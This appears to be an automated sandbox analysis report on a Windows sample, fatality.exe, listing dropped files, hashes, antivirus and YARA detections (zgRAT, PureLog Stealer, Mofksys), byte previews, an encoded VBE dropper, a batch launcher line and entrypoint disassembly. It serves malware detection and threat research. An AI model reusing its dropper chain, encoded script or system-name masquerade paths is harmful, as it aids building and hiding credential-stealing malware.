                                                                                                                                                          SHA-256:D7CA77A7512F7CD750D6FBA25CA790C78F1CAE373B4B9DFB4E684999EBFEFE38
                                                                                                                                                          SHA-512:71ADEBF6E5CF067BFAA6E988BF315D5D4F6C92E53BB9184ADDA4A6AB928CD5DEF21818AE12CC0FE4EB1B03DE5309E3F44147E8B20B5B1BBDA8D8C5DBC65A2F35
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\svchost.exe, Author: Joe Security
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$........t..............z.......................Rich............PE..L...f2YQ.....................0.......)............@..................................E..........................................(...........................................................................(... ....... ............................text.............................. ....data...............................@....rsrc............ ................5.@...l.[J............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Windows\System32\CSC8BED934F688E46C294B230B686E2243F.TMP

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                          File Type:MSVC .res
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1224
                                                                                                                                                          Entropy (8bit):4.435108676655666
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                                                                                          MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                                                                                          SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                                                                                          SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                                                                                          SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                                                                                                                          C:\Windows\System32\SecurityHealthSystray.exe

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):4608
                                                                                                                                                          Entropy (8bit):3.918318902150946
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:6bpnPtaM7Jt8Bs3FJsdcV4MKe27fqP+1vqBH6OulajfqXSfbNtm:OPBPc+Vx9My+1vkkcjRzNt
                                                                                                                                                          MD5:BFFC32285DADFBAEE0F4D0B2C64857A8
                                                                                                                                                          SHA1:ECDF50CFD9EE05CF6B2C4C654964EDA7C66A40AE
                                                                                                                                                          SHA-256:1CCCF77FE72E59F18F67AA9B04DD6CC0AC94A366F865FA19842FAADC720A4041
                                                                                                                                                          SHA-512:B04594F7FD37187EA411399EEB23E2C4BF94FE1A7D029BE3254BE10F357C3E11FD1F8963894C8A471CCC47BBD3AB1CB9FADAFB0642EF126D7B92A2F7AE1461E1
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f..g............................~'... ...@....@.. ....................................@.................................0'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`'......H.......(!................................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                                                                                                                          C:\blockcomSession\69ddcba757bf72

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (429), with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):429
                                                                                                                                                          Entropy (8bit):5.869193506119993
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:IdO2K40TxP08Zscz8ZvWXoo5Pi6DabMKxNgR7An:zBp7pSWXoehuxyRU
                                                                                                                                                          MD5:B9374E4AAC8602506F3C7869C1FEE7DB
                                                                                                                                                          SHA1:139A7F3ED7CD38DB7EA618E9B10EE2F163CF531B
                                                                                                                                                          SHA-256:D856AE66A62C28A2020ACD64D488A6BBE84B94E45CEE4B2265A90705257209A2
                                                                                                                                                          SHA-512:368D3779978AE2D10506F17E34E168503797CF4BB3D66667D725E873846591BDD8AEA5E9918F8E9F7CEB21150B9C96A275B93BA5657EC426D9B32984047537A7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:2Dpasop3tDYaoggfUOYsazwvVBodLug2jWkqqWnlpHRsaYJA9x94TO9DR4ErAMr9gg1R6zz8lwDThEU72ndYumjUXgZvR6lcZRL4g1EK7ATgLpfMjGzWsTO47g4ZZDqoLk3Q2aaAjTauSCIrBNLKGOuGDQ6A7pu4UoVlvOUIqyxZ2em4XMXM1fi6zxNleaC3igZnrh5w2DeRaVOioBmuSiCyGYv8BsoPw30WE8N0RkTyBQfejo6cyRlAdlhTv6vKYOfhe1dqywdrOOx02QZXvMbeR02db3EUzJZwu8ArKQnCy4vOyqafhXYMxBPo9AO5rI2FyAG3QrMeiZpXEnpvcjxbuN9ttWsJBsUqBqZxkhOzK4nXV1jVVdcIVbVlBWJ39Cc0F9WYN1K5U7QzjmY2xWyiQMUkVywNXVzIbxSVfLHdS

                                                                                                                                                          C:\blockcomSession\6ccacd8608530f

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):240
                                                                                                                                                          Entropy (8bit):5.728728607437259
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:PN3XwQp/+PBS27OeGn5vos1AEgfAgcmLaoEO3ZnEzvAFemFTdAnGO:PRAEInuws1AEgfvpaoTZn0IsQRk
                                                                                                                                                          MD5:88172E4B3906BAFE1EB3E15E004F192C
                                                                                                                                                          SHA1:01FD28DC70720FC334E52A8FAD4FE81ECA26D389
                                                                                                                                                          SHA-256:05E3069BD1D9568477A4F6551C126B56943CADF57B15179098B9FC5E0F5AAAF1
                                                                                                                                                          SHA-512:76BAA23F20554CDD5C3D3AA1D160F1646BDE1A0CCAA8A59054CA53AAF283BE75C52D34A1EFC37E928672CBF144C87B3743593E9EC1D2107087E6A797C1029BE3
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:6fUcnOWvywi4PBJ6jlyZozP1oiOEsF3rkKzNaOOxGJDeMnlSZFaehvjGPcyF9RDt20UFM6gVWASewvoB66pmoZJyks77aIyyGUlWTgGdjFHgcFUexwIDmaEcqfee9i5NMeYcKSsazLDjSmWfXdJnAvMpPIpxBldAJ3U8q2UfEsNaXeKDJ8GgYRNbRsMBm4YOrCZYSXyfJoiRivRv8loDf7l2p3q8qS2KT9sVFvvvKlWtt63g

                                                                                                                                                          C:\blockcomSession\DHqwUEpsrWozPqmBWAUuPmQlLJtKzj.exe

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2006016
                                                                                                                                                          Entropy (8bit):7.565400810273061
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:Ens6R8MzM9PKio0d/wAJqc47Z9CN1rgtq1DBukkM3vCRj8Joo4ytx605H3uG2nkZ:EaocGZcrgtq1NVkMfko4u6EL29qN
                                                                                                                                                          MD5:F568E43BC473CD8CEB2553C58194DF61
                                                                                                                                                          SHA1:14C0FFF25EDFD186DAB91EE6BCC94450C9BED84D
                                                                                                                                                          SHA-256:C91375814E8A5BB71736CE61FA429BC7B98A2B7B2A254B9967C51F3FCCFACD52
                                                                                                                                                          SHA-512:47CF66CE90FECD147077C72DC3F06DB2199B9BC96E887915D6B0D4BFEA7577D60A7345DA6E5BC59967D02528FBDF6C8BF86233261338F782B9185C890FBC400E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@....................................K....... ............................................................................ ............... ..H............text...$.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.........................\...M........................................0..........(.... ........8........E....*.......N...)...8%...(.... ....~p...{c...9....& ....8....*(.... ....~p...{y...:....& ....8....(.... ....~p...{....9....& ....8y......0.......... ........8........E....1...............V...8,.......~....(E...~....(I... ....?.... ....8.......... ....~p...{m...:....& ....8....~....(=... .... .... ....s....~....(A....... ....~p...{....9Q...& ....8F...r...ps....z*~....:..

                                                                                                                                                          C:\blockcomSession\Idle.exe

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2006016
                                                                                                                                                          Entropy (8bit):7.565400810273061
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:Ens6R8MzM9PKio0d/wAJqc47Z9CN1rgtq1DBukkM3vCRj8Joo4ytx605H3uG2nkZ:EaocGZcrgtq1NVkMfko4u6EL29qN
                                                                                                                                                          MD5:F568E43BC473CD8CEB2553C58194DF61
                                                                                                                                                          SHA1:14C0FFF25EDFD186DAB91EE6BCC94450C9BED84D
                                                                                                                                                          SHA-256:C91375814E8A5BB71736CE61FA429BC7B98A2B7B2A254B9967C51F3FCCFACD52
                                                                                                                                                          SHA-512:47CF66CE90FECD147077C72DC3F06DB2199B9BC96E887915D6B0D4BFEA7577D60A7345DA6E5BC59967D02528FBDF6C8BF86233261338F782B9185C890FBC400E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\blockcomSession\Idle.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\blockcomSession\Idle.exe, Author: Joe Security
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@....................................K....... ............................................................................ ............... ..H............text...$.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.........................\...M........................................0..........(.... ........8........E....*.......N...)...8%...(.... ....~p...{c...9....& ....8....*(.... ....~p...{y...:....& ....8....(.... ....~p...{....9....& ....8y......0.......... ........8........E....1...............V...8,.......~....(E...~....(I... ....?.... ....8.......... ....~p...{m...:....& ....8....~....(=... .... .... ....s....~....(A....... ....~p...{....9Q...& ....8F...r...ps....z*~....:..

                                                                                                                                                          C:\blockcomSession\R3z0peym99fhJdrKbUwEGrQMoM2HpnSPGrE0X0k2hc.bat

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\Desktop\fatality.exe
                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):89
                                                                                                                                                          Entropy (8bit):5.014619947625862
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:xDGTLz6PGKvAKa6YonqQILiM0XESLI3i9A:xDIz6PG0La6zILiMr4IS9A
                                                                                                                                                          MD5:DE5B4FDE5BC10D0F76A55EB9D249AB56
                                                                                                                                                          SHA1:751938B6AB03340842B429805FD2DA1AA0D8C964
                                                                                                                                                          SHA-256:009AA3F866391C87BD840EFB9B6B4EB33FC4DCB625CD23E436D0C9383E033F0F
                                                                                                                                                          SHA-512:58F02657DB363B742C6AEE66CCD5A6B279280E2DD09D7394B7B9907CA2CD005CD67EE88CA98D533605E30608FC61ABC6F51F7D3BE4A3813D7414D280B6F16A1F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:%ENrfyRjMcxlV%%CWcjcFQ%..%VaremYySQf%"C:\blockcomSession/containerReview.exe"%VRGeLHaFaS%

                                                                                                                                                          C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\Desktop\fatality.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):236
                                                                                                                                                          Entropy (8bit):5.863135001723359
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:G/kgwqK+NkLzWbHa/JUrFnBaORbM5nCeHWfwtqbcl3TjW67:G/kBMCzWLauhBaORbQCmWYtqbclT667
                                                                                                                                                          MD5:D2DD350044CE1FE408A44A036A7E6A0D
                                                                                                                                                          SHA1:3597E45DEB69F4AA4749855E9ED452A39A9C7D42
                                                                                                                                                          SHA-256:487BFE07ABFF347481F10C648717AAB8008C7606C026B920358544F85C25E1B2
                                                                                                                                                          SHA-512:81147D83DC5FFD1ADB10ADD8486F6DAC65DF0E7C579F8244EF8F3D6F646CED97FAD3F55A178CED9B60F5F23BB77A0E29BCCB22651280A9EAE135976AF71C366A
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                          Preview:#@~^0wAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFT!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z8^W13mK:Un/kkGxJz]f.!w.z:O,04B[Dn4`h3M.}tW\ _2xUn!.A!(TVyt^R(CDJS,!BP0mVknWUMAAA==^#~@.

                                                                                                                                                          C:\blockcomSession\c0a39dc94da3cf

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):290
                                                                                                                                                          Entropy (8bit):5.782645723344065
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:im8xWrpDYqQhS/APU+urlob6QZnx2glqXPKEH34QkLg:F8QCqQIIsfJ6Nx2KqCK4Qks
                                                                                                                                                          MD5:0529574E91154EEBB6B8516A400A3B60
                                                                                                                                                          SHA1:106A541128B6FB576BC513FD9F72EAA45FB862DE
                                                                                                                                                          SHA-256:6D407CF8493DC2C1F511D16A94491851028056AE69F3DA9021722A16C97DA2BF
                                                                                                                                                          SHA-512:2B621B3F2C4EA9C5ECC25EACA31223154F64947F016CDACC37789FAC354939DDDC55106FC1807D889BA0AD25A229A62ECBDBFC135A0352091DC0920091432925
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:GmO4k2ovCZF7h9HIYwTCWlPVPtY7ZzvXOGOM3gMZqtIrYV8yPCGQF64fX2p0drVMortbu5O1j4Wnch63ukrXtfSRLtzB1W58Y5DqmhDUyPrLkRCz5vF3A8dJYbQBGN9M8XPhePRNhXjexHr3r9FGQC8Zb4SKQBOkPeNMCeVqd2VmZ9VRtWUGI365YzFk7G7fI8OT4e1MnZnYrVAciAb4rHcVhRyNZusW50dauCXOfHcsQiNCynB7pCxBf3vmqox2qQd11krgnMZjouF9EvYvsuq2Cc51Qvi0Uj

                                                                                                                                                          C:\blockcomSession\containerReview.exe

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\Desktop\fatality.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2006016
                                                                                                                                                          Entropy (8bit):7.565400810273061
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:Ens6R8MzM9PKio0d/wAJqc47Z9CN1rgtq1DBukkM3vCRj8Joo4ytx605H3uG2nkZ:EaocGZcrgtq1NVkMfko4u6EL29qN
                                                                                                                                                          MD5:F568E43BC473CD8CEB2553C58194DF61
                                                                                                                                                          SHA1:14C0FFF25EDFD186DAB91EE6BCC94450C9BED84D
                                                                                                                                                          SHA-256:C91375814E8A5BB71736CE61FA429BC7B98A2B7B2A254B9967C51F3FCCFACD52
                                                                                                                                                          SHA-512:47CF66CE90FECD147077C72DC3F06DB2199B9BC96E887915D6B0D4BFEA7577D60A7345DA6E5BC59967D02528FBDF6C8BF86233261338F782B9185C890FBC400E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\blockcomSession\containerReview.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\blockcomSession\containerReview.exe, Author: Joe Security
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@....................................K....... ............................................................................ ............... ..H............text...$.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.........................\...M........................................0..........(.... ........8........E....*.......N...)...8%...(.... ....~p...{c...9....& ....8....*(.... ....~p...{y...:....& ....8....(.... ....~p...{....9....& ....8y......0.......... ........8........E....1...............V...8,.......~....(E...~....(I... ....?.... ....8.......... ....~p...{m...:....& ....8....~....(=... .... .... ....s....~....(A....... ....~p...{....9Q...& ....8F...r...ps....z*~....:..

                                                                                                                                                          C:\blockcomSession\f71eea7c943fb4

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (960), with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):960
                                                                                                                                                          Entropy (8bit):5.918376463190542
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:wCF8LKFLCpqpEBcJhzJ/Z6TRdgCfgZNEYNLIfvG4X+JONnID:wqFocHJhyD4ESM37vZE
                                                                                                                                                          MD5:BFB18DE77277E95DC1FE33ADA3A362A9
                                                                                                                                                          SHA1:9AEE3C1ECCE621DB2F4F077060BB31F942394187
                                                                                                                                                          SHA-256:22B9E0043A6DD3C64E2A5FEE3933CF6C339772F8B9C6A6A3B0E9FAF87DFA3B31
                                                                                                                                                          SHA-512:E0D120F10D00C412E6C95D3FD3E6A356204C339B6B9D8A26A2F16F0DA8C54AC87BAC67D21330525CB57393AAE5E0ACBB81E0502EF00A65A4E50460578E6C61D0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:kAwzsRDQhUYRR1VCUcrGCBiFGxvBMtfecDOPH1A2PBmSX1uUDtzGUu5jbrt4fBDxy4zNmF4dcz1AZPsODb7c4ZJsHpxaHFXN7yedCgr8zVnf24JM9e1EEk3YuHF7ReWWcoDkvPMgt9nivozNflbmOSJW4Fs5auqV9RDO1jbuSUUE7VnGR2bpCtIJfqppgRF9SSjeklW6KrT37EZjcmniSBSPJ3tK3vNBOVwpvIfpgffVZOLaRFN3nhqRATVq2LCZdSomSuxUG8Bxg604sS3xhUXrpfpcwyxUcF2GjjIhR3wpg2uDda8kSP1J577wFVhSKrVaDtUIJWfohsLwul9V0MCNOtLmmVb6VeeyhU9uGza5tMmMwKCdWLb7oIMUhsgx4jSCNWOalPPAwHdBG8zbT8kKDgKZHoMXTnBK4j9a6m2H5bLhoLOi3Ee68I9qLzS6C2rJGTHh9ZfrFdOmUnv6aodOJELvkSOGU6FDtCbUDqiejx1e3XWiEVfXZc9BHV6qKYWIYL2RLa2tF9pWNr1N6pC8broRCZNsu2UKasGseEWndvRZwnyadtueVYrqhkPwMK9Npf5fkJs2SZfpZOeYlxOBHzyBAZK4zkbSvEuRrSzTA2L63CRTF0KZ68Gzq4fL9yCs7M3VdNrS74AOn2I7I0y8ZBWx85kxxoULzd8qI502J2cB71MywhCIAES60GXim3fSkzZK3bzMA5zhjV0GtwBQlLLvKC0BiSPPXJbIcB5Ur0IEOvWfQQzz2OqYnn90lxospkKZ3ror1rivDGhZqVvRcaXIdCeyBEt3MZYok7lilH8Lq4VgGkKPCWPPMC60Nzpw7pjns3ytuMpVbMbir7sa4d00KIbiAuVvbMNBVryMwbf0q4yAkXJQHP1eytdjcPs9133P9aNAIfnd7AKPUb8nlFoMUsNmNPuhsg8wBjAKKIHllXgxjOOAREXwPq4Q

                                                                                                                                                          C:\blockcomSession\smss.exe

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2006016
                                                                                                                                                          Entropy (8bit):7.565400810273061
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:Ens6R8MzM9PKio0d/wAJqc47Z9CN1rgtq1DBukkM3vCRj8Joo4ytx605H3uG2nkZ:EaocGZcrgtq1NVkMfko4u6EL29qN
                                                                                                                                                          MD5:F568E43BC473CD8CEB2553C58194DF61
                                                                                                                                                          SHA1:14C0FFF25EDFD186DAB91EE6BCC94450C9BED84D
                                                                                                                                                          SHA-256:C91375814E8A5BB71736CE61FA429BC7B98A2B7B2A254B9967C51F3FCCFACD52
                                                                                                                                                          SHA-512:47CF66CE90FECD147077C72DC3F06DB2199B9BC96E887915D6B0D4BFEA7577D60A7345DA6E5BC59967D02528FBDF6C8BF86233261338F782B9185C890FBC400E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\blockcomSession\smss.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\blockcomSession\smss.exe, Author: Joe Security
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................................. ........@.. ....................................@....................................K....... ............................................................................ ............... ..H............text...$.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.........................\...M........................................0..........(.... ........8........E....*.......N...)...8%...(.... ....~p...{c...9....& ....8....*(.... ....~p...{y...:....& ....8....(.... ....~p...{....9....& ....8y......0.......... ........8........E....1...............V...8,.......~....(E...~....(I... ....?.... ....8.......... ....~p...{m...:....& ....8....~....(=... .... .... ....s....~....(A....... ....~p...{....9Q...& ....8F...r...ps....z*~....:..

                                                                                                                                                          Static File Info

                                                                                                                                                          General

                                                                                                                                                          File type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows, MZ for MS-DOS
                                                                                                                                                          Entropy (8bit):7.743793231206972
                                                                                                                                                          TrID:
                                                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                          File name:fatality.exe
                                                                                                                                                          File size:3'457'619 bytes
                                                                                                                                                          MD5:c883ea559bee9a0cb393aa32dcaf5d80
                                                                                                                                                          SHA1:995dfd0d9d504bec628e7d7297962677d8ab32cb
                                                                                                                                                          SHA256:bfd1aabb65dfce7b7c5f2d444917baa23fd04d6047e62cd1aaf9cb2a9ca9d3a9
                                                                                                                                                          SHA512:9ee8ef8a9912b14bcbeb3c13b2670c92eecc17c4a8a719d6bd9935f17239a244457e2f711c01e374febd767c866d6c563bad97e687680919ca0c017d738626ee
                                                                                                                                                          SSDEEP:98304:db5Nf/dq7yqKM1TcGZ6gtq1/Lko4uVa8N7:hMyqKM1TogtqT44NN7
                                                                                                                                                          TLSH:9BF5E11A5AD14A77C2A4177244A3403E5262DB363E71FF0B391F21E16813BB5DEB22B7
                                                                                                                                                          File Content Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode....$........t..............z.......................Rich............PE..L...f2YQ.....................0.......)............@................

                                                                                                                                                          File Icon

                                                                                                                                                          Icon Hash:b2f0cc697970b124

                                                                                                                                                          Static PE Info

                                                                                                                                                          General

                                                                                                                                                          Entrypoint:0x40290c
                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                          Digitally signed:false
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                          DLL Characteristics:
                                                                                                                                                          Time Stamp:0x51593266 [Mon Apr 1 07:08:22 2013 UTC]
                                                                                                                                                          TLS Callbacks:
                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                          OS Version Major:4
                                                                                                                                                          OS Version Minor:0
                                                                                                                                                          File Version Major:4
                                                                                                                                                          File Version Minor:0
                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                          Import Hash:8c16c795b57934183422be5f6df7d891

                                                                                                                                                          Entrypoint Preview

                                                                                                                                                          Instruction
                                                                                                                                                          push 00403ADCh
                                                                                                                                                          call 00007FF9FCEBEBA3h
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          dec eax
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], dh
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax+00h], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          push edi
                                                                                                                                                          or byte ptr [edx-3Bh], bh
                                                                                                                                                          xchg byte ptr [edx], bl
                                                                                                                                                          hlt
                                                                                                                                                          inc edi
                                                                                                                                                          test al, FBh
                                                                                                                                                          xchg eax, esp
                                                                                                                                                          std
                                                                                                                                                          jp 00007FF9FCEBEBAFh
                                                                                                                                                          xchg eax, ebx
                                                                                                                                                          hlt
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add dword ptr [eax], eax
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          iretw
                                                                                                                                                          adc dword ptr [edi+7250000Ch], esi
                                                                                                                                                          outsd
                                                                                                                                                          push 00000065h
                                                                                                                                                          arpl word ptr [ecx+esi+00h], si
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax+00000000h], dl
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [edx], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [ecx], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [edi-5Fh], bh
                                                                                                                                                          insb
                                                                                                                                                          in eax, dx
                                                                                                                                                          int3
